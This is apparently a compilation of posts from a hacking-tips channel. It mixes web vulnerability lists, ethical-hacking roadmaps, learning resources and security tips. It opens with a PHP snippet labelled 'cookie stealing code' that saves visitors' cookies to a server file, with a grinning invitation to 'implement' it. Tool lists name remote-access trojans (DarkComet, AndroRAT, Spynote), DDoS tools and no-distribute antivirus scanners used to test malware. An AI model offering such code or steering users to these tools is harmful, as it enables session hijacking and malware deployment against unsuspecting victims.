✨COOKIE STEALING CODE IN PHP STORES ON CPANEL✨

<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
    //store in file
    $cookie = json_encode($_COOKIE['user']);
    $filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
    file_put_contents('/filemanager/'. $filename, $cookie);
}
?>

⚠️USE YOUR BRAIN NOW TO IMPLEMENT ON  YOUR STUFF 😈

➡️ Give Reactions 🤟

🖥 100 Web Vulnerabilities, categorized into various types : 😀

⚡️ Injection Vulnerabilities:

1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚡️ Broken Authentication and Session Management:

14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚡️ Sensitive Data Exposure:

22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚡️ Security Misconfiguration:

28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚡️ XML-Related Vulnerabilities:

37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚡️ Broken Access Control:

40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚡️ Insecure Deserialization:

45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚡️ API Security Issues:

48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚡️ Insecure Communication:

52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚡️ Client-Side Vulnerabilities:

56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚡️ Denial of Service (DoS):

61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚡️ Other Web Vulnerabilities:

66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚡️ Mobile Web Vulnerabilities:

76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚡️ IoT Web Vulnerabilities:

80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚡️ Web of Things (WoT) Vulnerabilities:

83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚡️ Authentication Bypass:

85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚡️ Server-Side Request Forgery (SSRF):

87. Blind SSR
88. Time-Based Blind SSRF

⚡️ Content Spoofing:

89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚡️ Business Logic Flaws:

92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚡️ Zero-Day Vulnerabilities:

98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits

➡️ Give 100+ Reactions 😎

🔥🔥 If you want to become a hacker, it is essential to always be knowledgeable about what steps to do🔥🔥

1-Network Plus
2-CEH
3-Linux Commands
4-Cmd Commands
5-Windows Tools
6-Kali Linux Tools
7-Learning Php
8-Learning Python
9-Learning Ruby
10-Learning Perl
...
#exploithub

1-DDoS
2-Forensics
3-Programming
4-Exploitation
5-Phone Hacking
6-Server Hacking
7-Client Hacking
8-Website Hacking
9-Network Hacking
10-Wireless Hacking
11-Reverse Engeenering
12-Information Gathering

#DDoS
1-MDK3
2-LOIC
3-HULK
4-DDOSIM
5-Ufonet
6-Hping3
7-Xerxes
8-Hammer
9-Slowloris
10-Websploit
11-GoldenEye
12-Metasploit
13-Aireplay-ng
14-Slowhttptest

#Forensics
1-COFEE
2-Volafox
3-Autopsy
4-Foremost
5-Hashdeep
6-Binwalk

#Programming
1-Notepad++
2-Visual Studio
3-Text Editor

#Exploitation
1-Metasploit
2-Sqlmap
3-Core Imact
4-W3af
5-BeEF
6-Dradis

#Phone_Hacking
1-Metasploit
2-Apktool
3-Droidjack
4-AndroRAT
5-Spynote

#Server_Hacking
1-SQLmap
2-Jsql
3-Havij
4-Hydra
5-Metasploit
6-Armitage
7-Brupsuite
8-Owasp-ZAP
9-Netsparker
10-Acunetix
11-OpenVAS

#Client_Hacking
1-Darkcomet
2-FatRat
3-Veil-Evasion
4-Shallter
5-Unicorn
6-Setoolkit
7-Armitage
8-BeEF-Framework
9-EmPyre
10-FakeImageExploiter
11-Pupy
12-DFU-Programmer
13-Cobalt Strike
14-Exploitpack
15-Gcat
16-Crowbar

#Website_Hacking
1-Sn1per
2-Owasp-ZAP
3-Brupsuite
4-Netsparker
5-Acunetix
6-SQLmap
7-Xsser
8-WPScan
9-Joomrra
10-Joomscan
11-WPSeku
12-XSStrike
13-Kadimus
14-jexboss
15-CMSmap
16-brut3k1t
17-0d1n
18-CloudFail
19-Arachni
20-Nikto
21-Webscarab
22-Nmap
23-Vbscan
24-Sentry MBA

#Network_Hacking
1-MITMf
2-Bettercap
3-Ettercap
4-Tcpdump
5-Wireshark
6-Driftnet
7-SSLstrip
8-Armitage
9-Metasploit
10-Xerosploit
11-Sparta
12-Hydra

#Wireless_Hacking
1-Wifite
2-Airodump-ng
3-Aireplay-ng
4-Wash
5-WiFi Pumpkin
6-Wifiphisher
7-Fluxion
8-Infernal Twin
9-WPSpin

#Reverse_Engeenering
1-OWASP-ZSC
2-OllyDBG
3-Apktool

#Information_Gathering
1-Enum
2-Recon
3-Whois
4-Email Contact
5-Phone Contact
6-Service Status
7-Protocol Analysis

🌀ONE PROBLEM, ONE TOOL🌀

PROBLEMS                    - TOOLS
1. Graphic Design         - Canva
2. Subtitles                    - Blink
3. Digital Store              - Gumroad
4. Link in Bio                 - Stan store
5. Payment Gateway    - Wise
6. Profile Picture           - Pfpmaker
7. IG Automation          - Manychat
8. Email Marketing       -  ConvertKit
9. Design Anything       - Gen Al Firefly
10. Viral Analytics        - ViralFindr
11. Digital Products     - Product hunt
12. Logo                        - Lookadesign
13. Content Idea          - ChatGPT

18 most used Linux commands YOU MUST KNOW

- ls
- mv
- ssh
- cd
- cat
- sudo
- pwd
- grep
- top
-mkdir
- find
- wget
- rm
- chmod
- tar
- cp
- chwon
- gzip

18 Websites To Learn Linux For FREE

1. nixCraft
2. Tecmint
3. Linuxize
4. It’s FOSS
5. Linux Hint
6. LinuxOPsys
7. Linux Journey
8. Linux Academy
9. Linux Survival
10. Linux Command
11. Ryan’s Tutorials
12. Linux Handbook
13. Linux FoundationX
14. LabEx Linux For Noobs
15. Guru99 Linux Tutorial Summary
16. Conquering the command line
17. Intellipat Linux Tutorial for Beginners
18. The Debian Administrators Handbook

➡️ Give Reactions 🤟

Here are 27 ways to learn ethical hacking for free:

1. Root Me — Challenges.
2. Stök's YouTube — Videos.
3. Hacker101 Videos — Videos.
4. InsiderPhD YouTube — Videos.
5. EchoCTF — Interactive Learning.
6. Vuln Machines — Videos and Labs.
7. Try2Hack — Interactive Learning.
8. Pentester Land — Written Content.
9. Checkmarx — Interactive Learning.
10. Cybrary — Written Content and Labs.
11. RangeForce — Interactive Exercises.
12. Vuln Hub — Written Content and Labs.
13. TCM Security — Interactive Learning.
14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs.
16. OverTheWire — Written Content and Labs.
17. Hack The Box — Written Content and Labs.
18. CyberSecLabs — Written Content and Labs.
19. Pentester Academy — Written Content and Labs.
20. Bug Bounty Reports Explained YouTube — Videos.
21. Web Security Academy — Written Content and Labs.
22. Securibee's Infosec Resources — Written Content.
23. Jhaddix Bug Bounty Repository — Written Content.
24. Zseano's Free Bug Bounty Methodology — Free Ebook.
25. Awesome AppSec GitHub Repository — Written Content.
26. NahamSec's Bug Bounty Beginner Repository — Written Content.
27. Kontra Application Security Training — Interactive Learning.

How to Become Ethical Hacker In 2024

1. Develop a Strong Foundation in Computer Science and Programming:

Master a programming language like Python, Java, or C++. These languages are widely used in cybersecurity tools and scripts.

Understand computer networking concepts like TCP/IP, network protocols, and routing mechanisms.

Familiarize yourself with operating systems, including Linux, Windows, and macOS, as you'll be interacting with various systems during ethical hacking.

2. Learn Cybersecurity Fundamentals:

Grasp the principles of cryptography, encryption techniques, and hashing algorithms.

Understand vulnerability assessment and penetration testing (VAPT) methodologies.

Familiarize yourself with common security threats, attack vectors, and exploit techniques.

Explore web application security concepts, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

3. Enroll in Ethical Hacking Courses and Certifications:

Consider pursuing certifications like Certified Ethical Hacker (CEH) or CompTIA Penetration Testing+ (PT+) to validate your skills and knowledge.

Participate in online courses or bootcamps offered by reputable institutions to gain hands-on experience and practical skills.

Engage in virtual labs and Capture the Flag (CTF) competitions to test your skills and practice ethical hacking techniques.

4. Join Online Communities and Engage with Experts:

Engage in online forums, discussion groups, and communities dedicated to ethical hacking.

Connect with experienced hackers and cybersecurity professionals to seek guidance and mentorship.

Participate in workshops, conferences, and networking events to expand your knowledge and connections.

5. Contribute to Open-Source Projects and Build a Portfolio:

Contribute to open-source security projects to gain real-world experience and demonstrate your skills.

Participate in bug bounty programs to identify and report vulnerabilities in various systems.

Build a personal portfolio showcasing your ethical hacking projects, certifications, and contributions.

6. Stay Updated with the Latest Cybersecurity Trends:

Continuously read industry news, blogs, and research papers to keep abreast of emerging threats and vulnerabilities.

Participate in online webinars, workshops, and training sessions to stay updated on the latest hacking techniques and tools.

Attend cybersecurity conferences and events to network with experts and learn about cutting-edge technologies.

Top 10 Github Repositories For Web Developer

1. Web Developer-Roadmap : https://github.com/kamranahmedse/developer-roadmap

2. 30-Seconds-Of-Code : https://github.com/30-seconds/30-seconds-of-code

3. Awesome-Cheatsheets : https://github.com/LeCoupa/awesome-cheatsheets

4. CSS-Protips : https://github.com/AllThingsSmitty/css-protips

5. 33-JS-Concepts : https://github.com/leonardomso/33-js-concepts

6. You-Dont-Know-JS : https://github.com/getify/You-Dont-Know-JS/tree/2nd-ed

7. Front-End-Checklist : https://github.com/thedaviddias/Front-End-Checklist

8. Javascript-Questions : https://github.com/lydiahallie/javascript-questions

9. Clean-Code-Javascript : https://github.com/ryanmcdermott/clean-code-javascript

10. free-programming-books : https://github.com/EbookFoundation/free-programming-books

30 Days Roadmap to learn Ethical Hacking 👇👇

Day 1-3: Introduction to Ethical Hacking
- Understand the basics of ethical hacking and its importance
- Learn about different types of hackers and their motivations
- Explore the legal and ethical considerations of ethical hacking

Day 4-7: Networking Fundamentals
- Learn about networking protocols, IP addresses, and subnets
- Understand how data is transmitted over networks
- Explore common network vulnerabilities and how to secure them

Day 8-10: Information Gathering and Footprinting
- Learn how to gather information about a target system or network
- Explore techniques such as passive information gathering and footprinting
- Understand the importance of reconnaissance in ethical hacking

Day 11-14: Scanning and Enumeration
- Learn how to scan for open ports and services on a target system
- Understand the concept of enumeration and its role in ethical hacking
- Explore tools such as Nmap for scanning and enumeration

Day 15-17: Vulnerability Assessment and Exploitation
- Learn how to identify and assess vulnerabilities in a target system
- Understand common exploitation techniques and tools used in ethical hacking
- Explore how to exploit vulnerabilities responsibly and ethically

Day 18-21: Web Application Security
- Learn about common web application vulnerabilities (e.g., SQL injection, XSS)
- Understand how to secure web applications against attacks
- Explore tools such as Burp Suite for web application testing

Day 22-24: Wireless Network Security
- Learn about common wireless network vulnerabilities and attacks
- Understand how to secure wireless networks against intruders
- Explore tools such as Aircrack-ng for wireless network penetration testing

Day 25-27: Social Engineering and Physical Security
- Learn about social engineering techniques used in ethical hacking
- Understand the importance of physical security in cybersecurity
- Explore ways to protect against social engineering attacks

Day 28-30: Penetration Testing and Reporting
- Learn how to conduct penetration tests on systems and networks
- Understand the methodology of penetration testing (e.g., reconnaissance, scanning, exploitation, reporting)
- Practice conducting penetration tests on virtual environments and create detailed reports on findings

Remember to practice your skills in a controlled environment and always seek permission before performing any ethical hacking activities. Additionally, consider obtaining relevant certifications such as Certified Ethical Hacker (CEH) to validate your skills in ethical hacking.

Some good resources to learn Ethical Hacking

1. Tutorials & Courses
   - Informarion Security Free Course
   - Ethical Hacking Bootcamp
   - Network Hacking Course

2. Telegram Channels
   - Cyber Security and Ethical Hacking
   - Ethical Hacking Books

3. Books
   - Ultimate Linux Free Book
   - Python for Ethical Hacking

4. Ethical Hacking Forums

Join @free4unow_backup for more free resources

ENJOY LEARNING 👨‍💻🔒

➕ 16 Free Hosting Providers ⭐️

https://t.me/digitalmarketing_trick/14

🔰 Hacking manuals:

▪️ http://www.ehacking.net/
▪️ http://www.securitytube.net/
▪️ http://www.hacking-tutorial.com/
▪️https://hackproofhacks.com
▪️ https://www.offensive-security.com/
▪️ http://breakthesecurity.cysecurity.org/
▪️ http://www.spacerogue.net/wordpress/
▪️ https://www.youtube.com/user/Hak5Darren
▪️ https://www.youtube.com/user/sansinstitute
▪️ https://vimeo.com/channels/fullscopesecurity
▪️ http://www.kalitutorials.net/2013/08/kali-linux.html
▪️ https://www.youtube.com/user/DEFCONConference
▪️ https://en.wikibooks.org/wiki/Metasploit/VideoTutorials

🔰 Antiviruses:
▪️ http://fuckingscan.me/
▪️ http://v2.scan.majyx.net/
▪️ http://nodistribute.com/
▪️ http://www.file2scan.net/
▪️ https://t.me/hackingtipp
▪️ http://anubis.iseclab.org/
▪️ https://anonscanner.com/
▪️ http://virusscan.jotti.org/it
▪️ https://www.virustotal.com/nl/

🔰 Services for working with IP:
▪️ http://ip-api.com/
▪️ http://ipaddress.com
▪️ http://whatstheirip.com
▪️ http://www.whatismyip.com/
▪️ https://t.me/hackingtipp
▪️ http://www.ip2location.com/demo
▪️ http://www.my-ip-neighbors.com/
▪️ http://freegeoip.net/static/index.html
▪️ http://www.ip-adress.com/ipaddresstolocation/

➡️ Give 100+ Reactions 🤟

𝐂𝐲𝐛𝐞𝐫𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐓𝐢𝐩𝐬 𝟐𝟎𝟐𝟒

1. Think Before Clicking: Be careful with links, especially in emails and messages, as they could be traps set by hackers.

2. Strong and Unique Passwords: Use different passwords for each account and make them strong by mixing uppercase, lowercase, numbers, and symbols.

3. Password Manager: Use a password manager to keep track of all your passwords securely.

4. Two-factor Authentication (2FA): Add extra layers of security, like codes or fingerprints, to your login process.

5. Stay Updated with CERT-In: Keep an eye on CERT-In updates to stay informed about cybersecurity threats.

6. Keep Software Updated: Regularly update your software, browsers, and operating systems to patch vulnerabilities.

7. Use Firewalls and Anti-viruses: Protect your systems from various cyber threats like malware and viruses by using updated anti-virus software and firewalls.

8. Avoid Online Debit Card Use: When making online transactions, avoid using cards directly linked to your bank account for added security. Opt for safer payment methods like PayPal or credit cards.

9. Learn About Phishing Attacks: Be wary of phishing emails or messages that trick you into giving away personal information. Avoid clicking on suspicious links or opening attachments from unknown senders.

10. Avoid Unfamiliar Websites: Be cautious when visiting new websites, especially those shared by unknown sources, as they could contain harmful malware.

11. Avoid Useless Downloads: Limit downloads to essential software and browser extensions. Always opt for custom installations and decline any additional add-ons during the process.

12. Stay Cautious on Social Media: Limit the amount of personal information shared on social media platforms to prevent hackers from accessing sensitive data.

13. Regularly Backup Your Data: Create backups of your files and network data to mitigate loss from cyber attacks or data breaches.

14. Use VPN on Public WiFi: When using public WiFi, use a Virtual Private Network (VPN) to encrypt your device's traffic and enhance security against hackers.

15. Secure Your Data: Stay vigilant and educated about cybersecurity threats to safeguard your personal data and systems. Consider enrolling in a cybersecurity program to deepen your understanding of this field.

➡️ Give Reactions 🤟

M - motivation

Most Common Abbreviations 👇🏻

Wi-Fi – Wireless Fidelity
RAM – Random Access Memory
ROM – Read Only Memory
USB – Universal Serial Bus
HTML – Hyper Text Markup Language
WWW – World Wide Web
ISP – Internet Service Provider
FAQ – Frequently Asked Questions

Some of the Most Common Acronyms You Need To Know.

❇️ What is the difference between the dark web vs. the deep web ?

- The terms "dark web" and "deep web" are often used interchangeably, but they are not the same. Rather, the dark web is a small, less accessible part of the deep web.

- Both the dark and deep web share one thing in common: Neither can be found in search engine results. The difference between them primarily lies in how their content is accessed. Deep web pages can be accessed by anyone with a standard web browser who knows the URL.

- Dark web pages, in contrast, require special software with the correct decryption key, as well as access rights and knowledge of where to find the content.

- If you imagine the web in three layers, at the very top would be the surface web, whose content is indexed by search engines like Google and Yahoo. Beneath it is the deep web, and then located underneath that is the dark web.